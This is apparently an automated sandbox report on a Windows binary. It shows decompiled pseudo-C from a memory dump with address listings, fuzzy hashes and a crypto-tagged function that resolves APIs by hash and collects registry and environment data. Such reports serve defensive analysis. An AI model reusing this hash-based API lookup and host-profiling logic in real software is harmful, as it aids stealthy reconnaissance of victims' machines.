								}
								_t81 = _t81 + 0x10;
								if(_t81 < _t157) {
									continue;
								} else {
									_t90 = _a4;
									if(_t157 >= 0x7fffffff) {
										L45:
										_t157 = 0x7fffffff;
									} else {
										while( *((char*)(_t157 + _t101)) != 0) {
											_t157 = _t157 + 1;
											if(_t157 < 0x7fffffff) {
												continue;
											} else {
												goto L45;
											}
											goto L46;
										}
									}
								}
								goto L46;
							}
							_t169 = _t90;
							asm("bsf esi, esi");
							_t90 = _a4;
							_t157 = _t169 + _t81;
						} else {
							_t157 = 0;
							_t81 =  ~_t81 + 0x10;
							while( *((char*)(_t157 + _t101)) != 0) {
								_t157 = _t157 + 1;
								if(_t157 < _t81) {
									continue;
								} else {
									goto L39;
								}
								goto L46;
							}
						}
					}
					L46:
					_t121 =  <=  ? 0 : _t120;
					_t122 =  <  ? _t157 :  <=  ? 0 : _t120;
					_t158 = _t157 - _t122;
					if(_t146 < 0 || _t146 > _t158) {
						_t146 = _t158;
					}
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t161 = _t122 + _t101;
					if(_t161 == 0 ||  *(_t101 + _t122) == 0) {
						_push(0x40);
						_t162 = E00411030();
						_t174 = _t174 + 4;
						_t123 =  *_t90;
						if(_t123 == 0) {
							 *_t162 = 0;
						} else {
							if(_t162 != 0) {
								_t102 =  *_t123;
								 *_t162 = _t102;
								if(_t102 != 0) {
									_t148 = 0;
									while(1) {
										_t148 = _t148 + 1;
										_t103 =  *((char*)(_t123 + _t148 * 2 - 1));
										 *((char*)(_t162 + _t148 * 2 - 1)) = _t103;
										if(_t103 == 0) {
											goto L90;
										}
										_t104 =  *((char*)(_t123 + _t148 * 2));
										 *((char*)(_t162 + _t148 * 2)) = _t104;
										if(_t104 != 0) {
											continue;
										}
										goto L90;
									}
								}
							}
							L90:
							_push(1);
							_push(_t123);
							E004110B0();
							_t174 = _t174 + 8;
						}
						goto L92;
					} else {
						if(_t146 == 0) {
							_t115 = _t101 + _t122;
							_t78 = _t115 & 0x0000000f;
							if(_t78 == 0) {
								L56:
								asm("pxor xmm0, xmm0");
								_t146 =  ~( ~_t78 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb edx, xmm1");
									if(_t122 != 0) {
										break;
									}
									_t78 = _t78 + 0x10;
									if(_t78 < _t146) {
										continue;
									} else {
										if(_t146 >= 0x7fffffff) {
											L62:
											_t146 = 0x7fffffff;
										} else {
											while( *((char*)(_t146 + _t115)) != 0) {
												_t146 = _t146 + 1;
												if(_t146 < 0x7fffffff) {
													continue;
												} else {
													goto L62;
												}
												goto L63;
											}
										}
									}
									goto L63;
								}
								asm("bsf edi, edx");
								_t146 = _t146 + _t78;
							} else {
								_t146 = 0;
								_t78 =  ~_t78 + 0x10;
								while( *((char*)(_t146 + _t115)) != 0) {
									_t146 = _t146 + 1;
									if(_t146 < _t78) {
										continue;
									} else {
										goto L56;
									}
									goto L63;
								}
							}
						}
						L63:
						_t36 = _t146 + 1; // 0x80000000
						_t106 =  <=  ? 0x40 : _t36;
						if(_t106 > 0) {
							_v32 = (_t106 >> 5 >> 0x1a) + _t106 >> 6;
							_t107 = _t106 & 0x8000003f;
							if(_t107 < 0) {
								_t107 = (_t107 - 0x00000001 | 0xffffffc0) + 1;
							}
							_t110 = _v32 + (0 | _t107 > 0x00000000) << 6;
							_v32 = _t110;
							_push(_t110);
							_t75 = E00411030();
							_t174 = _t174 + 4;
							_t111 =  *_t90;
							if(_t111 == 0) {
								 *_t75 = 0;
							} else {
								if(_t75 != 0) {
									_t134 =  *_t111;
									 *_t75 = _t134;
									if(_t134 != 0) {
										_v36 = _t161;
										_t92 = 0;
										while(1) {
											_t92 = _t92 + 1;
											_t136 =  *((char*)(_t111 + _t92 * 2 - 1));
											 *((char*)(_t75 + _t92 * 2 - 1)) = _t136;
											if(_t136 == 0) {
												break;
											}
											_t137 =  *((char*)(_t111 + _t92 * 2));
											 *((char*)(_t75 + _t92 * 2)) = _t137;
											if(_t137 != 0) {
												continue;
											}
											break;
										}
										_t161 = _v36;
										_t90 = _a4;
									}
								}
								_push(1);
								_push(_t111);
								_v36 = _t75;
								E004110B0();
								_t75 = _v36;
								_t174 = _t174 + 8;
							}
							 *(_t90 + 4) = _v32;
							 *_t90 = _t75;
						} else {
							_t75 = 0;
						}
						if(_t75 != 0) {
							_t112 = 0;
							while(1) {
								_t133 =  *_t161;
								_t112 = _t112 + 1;
								 *_t75 = _t133;
								if(_t146 != 0 && _t112 == _t146) {
									break;
								}
								if(_t133 != 0) {
									_t75 = _t75 + 1;
									_t161 = _t161 + 1;
									continue;
								}
								goto L93;
							}
							 *((char*)(_t75 + 1)) = 0;
						}
					}
				} else {
					_push(0x40);
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t162 = E00411030();
					_t174 = _t174 + 4;
					_t139 =  *_t90;
					if(_t139 == 0) {
						 *_t162 = 0;
					} else {
						if(_t162 != 0) {
							_t116 =  *_t139;
							 *_t162 = _t116;
							if(_t116 != 0) {
								_t154 = 0;
								while(1) {
									_t154 = _t154 + 1;
									_t117 =  *((char*)(_t139 + _t154 * 2 - 1));
									 *((char*)(_t162 + _t154 * 2 - 1)) = _t117;
									if(_t117 == 0) {
										goto L32;
									}
									_t118 =  *((char*)(_t139 + _t154 * 2));
									 *((char*)(_t162 + _t154 * 2)) = _t118;
									if(_t118 != 0) {
										continue;
									}
									goto L32;
								}
							}
						}
						L32:
						_push(1);
						_push(_t139);
						E004110B0();
						_t174 = _t174 + 8;
					}
					L92:
					 *(_t90 + 4) = 0x40;
					 *_t90 = _t162;
				}
				goto L93;
			}

0x00424ca9
0x00424cac
0x00424cb1
0x00424cb7
0x00424cbb
0x00424cbf
0x00424cc3
0x0042508e
0x00425090
0x00424cc9
0x00424ccb
0x00424cce
0x00424ce6
0x00424cea
0x00424cf6
0x00424cfc
0x00424cfc
0x00424d01
0x00424d05
0x00424d0b
0x00000000
0x00000000
0x00424d11
0x00424d16
0x00000000
0x00424d18
0x00424d1e
0x00424d33
0x00424d33
0x00000000
0x00424d20
0x00424d20
0x00424d2a
0x00424d31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424d31
0x00000000
0x00424d20
0x00424d1e
0x00000000
0x00424d16
0x00425087
0x0042508a
0x00000000
0x00424cd0
0x00424cd2
0x00424cd4
0x00424cd7
0x00424ce1
0x00424ce4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424ce4
0x00425078
0x0042507a
0x00424d38
0x00424d38
0x00424d3a
0x00424d3f
0x00424d41
0x00424d44
0x00424d48
0x00424d4b
0x00424d4d
0x00424d57
0x00424d5d
0x00000000
0x00000000
0x00000000
0x00424d5d
0x00425068
0x00425069
0x0042506d
0x00000000
0x00425073
0x00000000
0x00425073
0x00000000
0x0042506d
0x00424d5f
0x00424d5f
0x00425080
0x00425080
0x00425080
0x00000000
0x00425024
0x0042502f
0x00000000
0x0042502f
0x00424cce
0x00424d62
0x00424d64
0x00424d65
0x00424d69
0x00424d6b
0x00424d70
0x00424d73
0x00424d77
0x00424d7a
0x00424d7c
0x00424d86
0x00424d8c
0x00000000
0x00000000
0x00000000
0x00424d8c
0x00425058
0x00425059
0x0042505d
0x00000000
0x00425063
0x00000000
0x00425063
0x00000000
0x0042505d
0x00424d8e
0x00424d8e
0x00424d8e
0x00424d91
0x00424d96
0x00424df3
0x00425051
0x00424df9
0x00424dfb
0x00424dfe
0x00424e12
0x00424e16
0x00424e22
0x00424e28
0x00424e28
0x00424e2d
0x00424e31
0x00424e37
0x00000000
0x00000000
0x00424e3d
0x00424e42
0x00000000
0x00424e44
0x00424e44
0x00424e4d
0x00424e5e
0x00424e5e
0x00000000
0x00424e4f
0x00424e55
0x00424e5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424e5c
0x00424e4f
0x00424e4d
0x00000000
0x00424e42
0x00425042
0x00425044
0x00425047
0x0042504a
0x00424e00
0x00424e02
0x00424e04
0x00424e07
0x00424e0d
0x00424e10
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424e10
0x00424e07
0x00424dfe
0x00424e63
0x00424e67
0x00424e6c
0x00424e6f
0x00424e73
0x00424e79
0x00424e79
0x00424e7d
0x00424e7f
0x00424e84
0x00424e86
0x00424fd1
0x00424fd8
0x00424fda
0x00424fdd
0x00424fe1
0x00425018
0x00424fe3
0x00424fe5
0x00424fe7
0x00424fea
0x00424fee
0x00424ff0
0x00424ff2
0x00424ff2
0x00424ff3
0x00424ff8
0x00424ffe
0x00000000
0x00000000
0x00425000
0x00425004
0x00425009
0x00000000
0x00000000
0x00000000
0x00425009
0x00424ff2
0x00424fee
0x0042500b
0x0042500b
0x0042500d
0x0042500e
0x00425013
0x00425013
0x00000000
0x00424e96
0x00424e98
0x00424e9a
0x00424e9e
0x00424ea1
0x00424eb5
0x00424eb9
0x00424ec5
0x00424ecb
0x00424ecb
0x00424ed0
0x00424ed4
0x00424eda
0x00000000
0x00000000
0x00424ee0
0x00424ee5
0x00000000
0x00424ee7
0x00424eed
0x00424efe
0x00424efe
0x00000000
0x00424eef
0x00424ef5
0x00424efc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424efc
0x00424eef
0x00424eed
0x00000000
0x00424ee5
0x00425038
0x0042503b
0x00424ea3
0x00424ea5
0x00424ea7
0x00424eaa
0x00424eb0
0x00424eb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00424eb3
0x00424eaa
0x00424ea1
0x00424f03
0x00424f08
0x00424f0e
0x00424f13
0x00424f29
0x00424f2d
0x00424f33
0x00424f3b
0x00424f3b
0x00424f49
0x00424f4c
0x00424f50
0x00424f51
0x00424f56
0x00424f59
0x00424f5d
0x00424fa7
0x00424f5f
0x00424f61
0x00424f63
0x00424f66
0x00424f6a
0x00424f6e
0x00424f71
0x00424f73
0x00424f73
0x00424f74
0x00424f79
0x00424f7f
0x00000000
0x00000000
0x00424f81
0x00424f85
0x00424f8a
0x00000000
0x00000000
0x00000000
0x00424f8a
0x00424f8c
0x00424f8f
0x00424f8f
0x00424f6a
0x00424f92
0x00424f94
0x00424f95
0x00424f99
0x00424f9e
0x00424fa2
0x00424fa2
0x00424fae
0x00424fb1
0x00424f15
0x00424f15
0x00424f15
0x00424fb5
0x00424fb7
0x00424fbd
0x00424fbd
0x00424fc0
0x00424fc1
0x00424fc5
0x00000000
0x00000000
0x00424fcd
0x00424fbb
0x00424fbc
0x00000000
0x00424fbc
0x00000000
0x00424fcd
0x00425032
0x00425032
0x00424fb5
0x00424d98
0x00424d9a
0x00424d9c
0x00424d9e
0x00424da6
0x00424da8
0x00424dab
0x00424daf
0x00424de9
0x00424db1
0x00424db3
0x00424db5
0x00424db8
0x00424dbc
0x00424dbe
0x00424dc0
0x00424dc0
0x00424dc1
0x00424dc6
0x00424dcc
0x00000000
0x00000000
0x00424dce
0x00424dd2
0x00424dd7
0x00000000
0x00000000
0x00000000
0x00424dd7
0x00424dc0
0x00424dbc
0x00424dd9
0x00424dd9
0x00424ddb
0x00424ddc
0x00424de1
0x00424de1
0x0042501b
0x0042501b
0x00425022
0x00425022
0x00000000

Strings

, xrefs: 00424CAC

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: c7425b28aede19798f0b2843d18bcc407c8558adbe40fa363f8b9bf6a14fcd68
Instruction ID: 36c85ce1ba4ab48938605ff2e8ae8235e15a0529f7b69327235bd9a7971327fa
Opcode Fuzzy Hash: c7425b28aede19798f0b2843d18bcc407c8558adbe40fa363f8b9bf6a14fcd68
Instruction Fuzzy Hash: C0B18135B0977246D7254A3CA8903376AC2EFD2310F6EC36FC8D54B396DA7D8C418289

Uniqueness

Uniqueness Score: -1.00%

Function 00406AD0, Relevance: .9, Instructions: 932
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00406AD0(void* __ebx, char __ecx, char __edx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				char _v120;
				char _v176;
				char _v192;
				char _v216;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				char _v340;
				char _v344;
				char _v348;
				signed int _v352;
				signed int _v360;
				short _v364;
				char _v368;
				char _v376;
				void* _v380;
				char _v404;
				char _v408;
				signed int _v420;
				char _v440;
				intOrPtr _v448;
				char _v452;
				char _v456;
				char _v464;
				char _v468;
				signed int _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v508;
				char _v512;
				char _v516;
				char _v524;
				char _v528;
				char _v532;
				void* _v540;
				char _v552;
				char _v556;
				signed int _v560;
				char _v564;
				char _v568;
				char _v572;
				void* _v576;
				char _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				void* _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				signed int _v608;
				void* _v612;
				char _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				signed int* _v628;
				signed int _v632;
				signed int _v636;
				char _v640;
				signed int _v644;
				char _v648;
				char _v652;
				signed int _v656;
				signed int _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				void* _v680;
				char _v684;
				intOrPtr* _v688;
				char _v692;
				void* _v696;
				void* _v700;
				void* _v704;
				char _v708;
				void* _v712;
				char _v720;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v760;
				void* _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v824;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v948;
				void* _v956;
				signed int _t329;
				signed int _t330;
				intOrPtr _t375;
				intOrPtr* _t382;
				intOrPtr _t389;
				void* _t400;
				signed int _t416;
				signed int _t417;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t449;
				void* _t454;
				signed int _t467;
				signed int _t476;
				signed int _t478;
				void* _t497;
				signed int _t506;
				signed int _t507;
				signed int _t519;
				void* _t521;
				signed int _t529;
				signed int _t535;
				signed int _t547;
				signed int _t549;
				signed int _t551;
				signed int _t561;
				signed int _t565;
				signed int _t567;
				signed int _t579;
				signed int _t591;
				signed int _t592;
				signed short* _t594;
				signed int _t600;
				void* _t602;
				intOrPtr* _t603;
				void* _t610;
				signed int _t755;
				signed int _t804;
				signed int* _t808;
				void* _t810;
				signed int _t849;
				signed int _t850;
				signed int _t853;
				signed int* _t855;
				signed int _t860;
				signed int _t861;
				signed int* _t862;
				signed int _t864;
				signed int _t867;
				intOrPtr _t868;
				void* _t871;
				signed int _t872;
				signed int _t874;
				signed int _t876;
				signed int _t878;

				_t874 = _t876;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t878 = (_t876 & 0xfffffff0) - 0x274;
				_v192 = __ecx;
				_v640 = __edx;
				_t867 =  *0x43b000; // 0xffffffff
				_v644 = (E00413930(__ebx, 0, __edi, _t867))[2] & 0x000000ff;
				_t855 = E00413930(__ebx, 0, __edi, _t867);
				_t329 =  *0x43b260; // 0x2491ee8
				_v636 = _t329;
				if(_t329 == 0) {
					_push(0x10);
					_t330 = E00411030();
					_v636 = _t330;
					_t878 = _t878 + 4;
					__eflags = _v636;
					if(_v636 == 0) {
						_v636 = 0;
					} else {
						_t853 = _t330;
						 *((intOrPtr*)(_t853 + 4)) = 0;
						 *((intOrPtr*)(_t853 + 8)) = 0;
						 *((intOrPtr*)(_t853 + 0xc)) = 0;
					}
					_t808 = _v636;
					 *0x43b260 = _t808;
					 *_t808 =  *0x43b024 & 0x0000ffff;
					__eflags = ( *0x43b02b & 0x000000ff) - 0xa;
					if(( *0x43b02b & 0x000000ff) <= 0xa) {
					}
					__eflags =  *0x43b02b & 0x000000ff;
					if(( *0x43b02b & 0x000000ff) > 0) {
						__eflags = 0;
						_v584 = _t867;
						_t872 = 0;
						do {
							_v360 = 0;
							_t850 = _t872 + _t872 * 2;
							_v368 =  *((intOrPtr*)(0x43b02c + _t850 * 2));
							_v364 =  *(0x43b030 + _t850 * 2) & 0x0000ffff;
							E00433100( &_v344,  &_v368, _t874,  &_v344);
							_t804 =  *0x43b260; // 0x2491ee8
							_t322 = _t804 + 4; // 0x3
							E004237E0(_t804 + 4, _v348,  *_t322);
							E00420B10( &_v344);
							_t872 = _t872 + 1;
							__eflags = _t872 - ( *0x43b02b & 0x000000ff);
						} while (_t872 < ( *0x43b02b & 0x000000ff));
						_t579 =  *0x43b260; // 0x2491ee8
						_t867 = _v584;
						_v636 = _t579;
					}
				}
				_t810 =  !=  ? 0x10 : _t855[3] & 0x000000ff;
				_t610 =  !=  ? 0 : 0x20;
				_t585 =  !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20;
				_t813 =  <=  ? 0 : 0x80;
				_t586 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80);
				_t587 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff;
				_t588 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 8;
				_t589 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010;
				_t590 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855;
				E004206A0( &_v240, _t874, 0);
				_push(0);
				E00429350( &_v304);
				E0042B360( &_v240);
				E00420B30( &_v248, 0, _v240);
				E00420B10( &_v244);
				_v120 = E00426040(_v252, 0x7fffffff);
				E00429710( &_v312,  &_v120, 1);
				_v652 = _v260;
				E00429710( &_v320, _v652, E00426040(_v260, 0x7fffffff));
				E0042BA80((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867, _t874);
				_push(0);
				_push( &_v260);
				E00429EB0((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867);
				E00421240( &_v268,  &_v260);
				E00420B30( &_v280, 0x7fffffff, _v264);
				E00420B10( &_v268);
				E00420B10( &_v276);
				E00429510( &_v328);
				_v676 = _v284;
				E00429710( &_v344, _v676, E00426040(_v284, 0x7fffffff));
				_v216 = E00410B50( *_v688);
				E00429710( &_v352,  &_v216, 2);
				_v248 = E00410B60((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855);
				E00429710( &_v360,  &_v248, 4);
				_v248 = _v708;
				E00429710( &_v368,  &_v248, 4);
				_t822 =  &_v176;
				_v176 = _v720;
				E00429710( &_v376,  &_v176, 1);
				_t886 =  *0x43b264;
				if( *0x43b264 == 0) {
					 *0x43b264 = 1;
					E004206A0(_t878 + 0xe0, _t874, 0);
					E00420D40(E00420D40(E00420D40( &_v440, 0x2e), 0x4b), 0x42);
					E00418810( &_v532, 0);
					E004196D0(E004196D0(E004196D0(E004196D0(_t878 + 0x90, 0x20), 0x28), 0x4b), 0x42);
					asm("movups xmm0, [0x439400]");
					_t375 =  *0x439410; // 0x13401ec1
					asm("movups [esp], xmm0");
					_v676 = _t375;
					_push(0);
					E00429350( &_v568);
					_v628 = _t855;
					_t591 = 0;
					__eflags = 0;
					_v636 = _t867;
					do {
						E00429670( &_v572, E00429650( &_v572) + 4);
						_t868 =  *((intOrPtr*)(_t878 + _t591 * 4));
						_t382 = E00429640( &_v572, E00429650( &_v572) + 0xfffffffc);
						_t591 = _t591 + 1;
						 *_t382 = _t868;
						__eflags = _t591 - 5;
					} while (_t591 < 5);
					_t592 = 0;
					__eflags = 0;
					_t857 = _v592;
					_t869 = _v600;
					_v568 = 0;
					_v564 = 0;
					_v560 = 0;
					do {
						_push(0);
						E0042C550(_t592,  &_v556, _t869, _t874, _t878 + 0x84, 0x80000002);
						E0042CE00(_t592,  &_v568, _t857, _t869, _t874,  &_v340);
						E00418810( &_v472, 0);
						E00418810( &_v468, 0);
						__eflags = _v352;
						if(_v352 > 0) {
							_v604 = _t592;
							_t871 = 0;
							__eflags = 0;
							do {
								_t603 = E00427600(_t878 + 0x150, _t871);
								_t535 = E00421000(_t603);
								__eflags = _t535;
								if(_t535 == 0) {
									__eflags = E00421460(_t603, _v448);
									if(__eflags == 0) {
										_push(_v560);
										_push(0);
										E0042BF30( &_v652, __eflags,  *_t603);
										_t857 =  &_v644;
										E0042C580( &_v664, _t822,  &_v644, 0xffa790dd);
										E0042CAE0( &_v672,  &_v644, _v652);
										E00420B10( &_v644);
										E0041F6E0( &_v652,  &_v644);
										E00418CC0(_t878 + 0xd0, _v648);
										E00418CA0( &_v652);
										E00418CA0( &_v660);
										_t547 = E00419DC0(_t878 + 0xcc);
										__eflags = _t547;
										if(_t547 != 0) {
											L70:
											E00418CA0( &_v648);
											__eflags = _v652;
											if(_v652 != 0) {
												_t822 = _v656;
												__eflags = _t822;
												if(_t822 == 0) {
													L74:
													_t549 = 1;
												} else {
													__eflags = _t822 - 0xffffffff;
													if(_t822 == 0xffffffff) {
														goto L74;
													} else {
														_t549 = 0;
													}
												}
												__eflags = _t549;
												if(_t549 == 0) {
													E0042BF00(_t822);
												}
											}
											_v656 = 0;
											goto L38;
										} else {
											_t551 = E0041A330( &_v472, _t871,  *((intOrPtr*)(_t878 + 0x8c)));
											__eflags = _t551;
											if(_t551 == 0) {
												_t857 = _t878;
												E0042C580( &_v660, _t822, _t878, 0x494c03d0);
												E0042CAE0( &_v668,  &_v640, _v684);
												E00420B10(_t878);
												E0041F6E0( &_v648,  &_v640);
												E00418CC0( &_v484, _v644);
												E00418CA0( &_v648);
												E00418CA0( &_v656);
												_t561 = E00419DC0( &_v488);
												__eflags = _t561;
												if(_t561 == 0) {
													E004196D0(E00420220(E004196D0(E004196D0( &_v472, 0x20), 0x28), _v472, 0), 0x29);
												}
												_t822 = _v472;
												E00417FA0( &_v668);
												E00420B30(_t603, _v472, _v668);
												E00420B10( &_v672);
												_push( *_t603);
												_t565 = E00428820(_t603,  &_v588, _t857, _t871);
												__eflags = _t565;
												if(_t565 == 0) {
													E004237E0( &_v588,  *_t603, _v588);
												}
												E00418CA0( &_v652);
												__eflags = _v656;
												if(_v656 != 0) {
													_t822 = _v660;
													__eflags = _t822;
													if(_t822 == 0) {
														L86:
														_t567 = 1;
													} else {
														__eflags = _t822 - 0xffffffff;
														if(_t822 == 0xffffffff) {
															goto L86;
														} else {
															_t567 = 0;
														}
													}
													__eflags = _t567;
													if(_t567 == 0) {
														E0042BF00(_t822);
													}
												}
												_v660 = 0;
												goto L38;
											} else {
												goto L70;
											}
										}
										goto L99;
									}
								}
								L38:
								_t871 = _t871 + 1;
								__eflags = _t871 -  *((intOrPtr*)(_t878 + 0x14c));
							} while (_t871 <  *((intOrPtr*)(_t878 + 0x14c)));
							_t592 = _v604;
						}
						_t389 = _v600;
						__eflags =  *((char*)(_t389 + 0xb)) - 0x28;
						if( *((char*)(_t389 + 0xb)) < 0x28) {
							_t867 = _v608;
							E00418CA0( &_v456);
							E00418CA0( &_v464);
							E00427560(_t878 + 0x14c, _t857, _t867);
							E00418CA0( &_v552);
							__eflags = _v556;
							if(_v556 != 0) {
								_t849 = _v560;
								__eflags = _t849;
								if(_t849 == 0) {
									L64:
									_t519 = 1;
								} else {
									__eflags = _t849 - 0xffffffff;
									if(_t849 == 0xffffffff) {
										goto L64;
									} else {
										_t519 = 0;
									}
								}
								__eflags = _t519;
								if(_t519 == 0) {
									E0042BF00(_t849);
								}
							}
							_v560 = 0;
						} else {
							_t521 = E00429650(_t878 + 0x7c);
							_t190 = _t521 + 4; // 0x4
							E00429670(_t878 + 0x80, _t190);
							_t857 = _t521 + 0xfffffffc;
							__eflags = _t857;
							if(_t857 > 0) {
								_t869 = E00429640(_t878 + 0x80, 8);
								E00410BC0(_t531, E00429640(_t878 + 0x80, 4), _t857);
								_t878 = _t878 + 0xc;
							}
							 *((intOrPtr*)(E00429640(_t878 + 0x80, 4))) = 0xd2b02901;
							E00418CA0(_t878 + 0xd4);
							E00418CA0( &_v468);
							E00427560( &_v340, _t857, _t869);
							E00418CA0( &_v556);
							__eflags = _v560;
							if(_v560 != 0) {
								_t822 = _v560;
								__eflags = _t822;
								if(_t822 == 0) {
									L47:
									_t529 = 1;
								} else {
									__eflags = _t822 - 0xffffffff;
									if(_t822 == 0xffffffff) {
										goto L47;
									} else {
										_t529 = 0;
									}
								}
								__eflags = _t529;
								if(_t529 == 0) {
									E0042BF00(_t822);
								}
							}
							goto L50;
						}
						L52:
						E0040ABE0(_t878 + 0x94, 0);
						E004183B0( &_v512);
						E00426EC0(_t878 + 0x9c, _v512, 0);
						E00420B10(_t878 + 0x9c);
						_t400 = E004237E0(E004288F0( &_v584), _v528,  *_t399);
						_t858 = _t878 + 0xa4;
						E00427FC0(_t400, _t878 + 0xa4, 0x3b);
						_v452 = E00410B60(E00426040(_v528, 0x7fffffff));
						E00429710( &_v348,  &_v452, 4);
						E00429710(_t878 + 0x160,  *((intOrPtr*)(_t878 + 0xa4)), E00426040( *((intOrPtr*)(_t878 + 0xa4)), 0x7fffffff));
						E00420B10(_t878 + 0xa4);
						E00420B10( &_v560);
						E00427560( &_v616, _t878 + 0xa4, _t867);
						E004206A0(_t878 + 0xb0, _t874, 0);
						E004206A0( &_v532, _t874, 0);
						E004206A0( &_v528, _t874, 0);
						_push(0);
						E00429350( &_v644);
						 *((intOrPtr*)(_t878 + 0xe4)) = 0;
						 *((intOrPtr*)(_t878 + 0xe8)) = 0;
						_v488 = 0;
						_t416 = E004115C0(0xa1310f65, 0xf95c938e);
						__eflags = _t416;
						if(_t416 == 0) {
							_t594 = 0;
							__eflags = 0;
							_t417 =  *0x00000000 & 0x0000ffff;
							__eflags = _t417;
							while(_t417 != 0) {
								__eflags = _t417 - 0x3d;
								if(_t417 != 0x3d) {
									E004183B0( &_v404);
									E004237E0(_t878 + 0xec, _v404,  *((intOrPtr*)(_t878 + 0xe4)));
									E00420B10(_t878 + 0x10c);
								}
								_t594 = _t594 + 2 + E00420180(_t594, 0x7fffffff, _t867) * 2;
								_t417 =  *_t594 & 0x0000ffff;
								__eflags = _t417;
							}
							E00427FC0(E004288F0(E00423EC0(_t878 + 0xe4)),  &_v476, 0xa);
							E00426EC0( &_v508, _v484, 0);
							E00420B10( &_v476);
							E00427560(_t878 + 0xe4, _t858, _t867);
							_v440 = E00410B60(E00426040(_v516, 0x7fffffff));
							E00429710( &_v344,  &_v440, 4);
							E00429710( &_v352, _v524, E00426040(_v524, 0x7fffffff));
							E00429510( &_v628);
							E00420B10( &_v516);
							E00420B10( &_v524);
							E00420B10( &_v532);
							E00429510( &_v580);
							E00418CA0( &_v564);
							E00420B10( &_v484);
							goto L2;
						} else {
							asm("int3");
							return _t416;
						}
						goto L99;
						L50:
						_t592 = _t592 + 1;
						_v560 = 0;
						__eflags = _t592 - 2;
					} while (_t592 < 2);
					_t867 = _v608;
					goto L52;
				} else {
					L2:
					E0040ABE0( &_v260, 2);
					E00421EB0( &_v260, _t886,  &_v244, 0x3b);
					E00420B10( &_v268);
					_push(E00429650(_t878 + 0x158));
					E00429350( &_v304);
					_v620 =  *((intOrPtr*)(_t878 + 0x1ac));
					_v624 = E00426040( *((intOrPtr*)(_t878 + 0x1ac)), 0x7fffffff);
					_t444 = E00429640( &_v340, 0);
					_t445 = E00429650( &_v344);
					_t446 = E00429640( &_v312, 0);
					_push(0);
					_push(0);
					_push(_t446);
					_push(_t445);
					_push(_t444);
					_t832 = _v632;
					E0042E5D0(_v628, _v632, _t867);
					_t449 = E0042A190(_t878 + 0x178);
					_push(0);
					E00429350(_t878 + 0x1e4);
					_v244 = E00410B60(_t449);
					E00429710(_t878 + 0x1ec,  &_v244, 4);
					_t454 = E00429640( &_v348, 0);
					E00429710( &_v244, _t454, E00429650( &_v352));
					E00429510( &_v360);
					E00420B10(_t878 + 0x1ac);
					E00429510(_t878 + 0x158);
					E00420B10(_t878 + 0x194);
					_push(0);
					E00429350(_t878 + 0x1f8);
					_push(0);
					E00429350( *((intOrPtr*)(_t878 + 0x1c8)));
					_t860 =  *0x43b260; // 0x2491ee8
					if(_t860 == 0) {
						_push(0x10);
						_t861 = E00411030();
						_t878 = _t878 + 4;
						__eflags = _t861;
						if(_t861 == 0) {
							_t861 = 0;
							__eflags = 0;
						} else {
							 *(_t861 + 4) = 0;
							 *((intOrPtr*)(_t861 + 8)) = 0;
							 *((intOrPtr*)(_t861 + 0xc)) = 0;
						}
						 *_t861 =  *0x43b024 & 0x0000ffff;
						_t832 =  *0x43b02b & 0x000000ff;
						 *0x43b260 = _t861;
						__eflags = ( *0x43b02b & 0x000000ff) - 0xa;
						if(( *0x43b02b & 0x000000ff) <= 0xa) {
						}
